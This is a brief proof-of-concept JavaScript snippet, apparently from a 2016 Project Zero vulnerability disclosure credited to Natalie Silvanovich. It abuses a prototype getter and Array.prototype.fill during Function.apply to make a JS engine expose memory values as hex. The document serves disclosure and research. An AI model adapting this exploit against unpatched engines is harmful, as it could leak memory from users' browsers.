- Report: Aug 2016
- Fix: Oct 2016
- Credit: Natalie Silvanovich, Google Project Zero
var t = new Array(1,2,3);
function f(){
var h = [];
var a = [...arguments]
for(item in a){
var n = new Number(a[item]);
if( n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
//alert(h);
}
var q = f;
t.length = 20;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
var ta = [];
ta.fill.call(t, "natalie");
return 5;
}
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);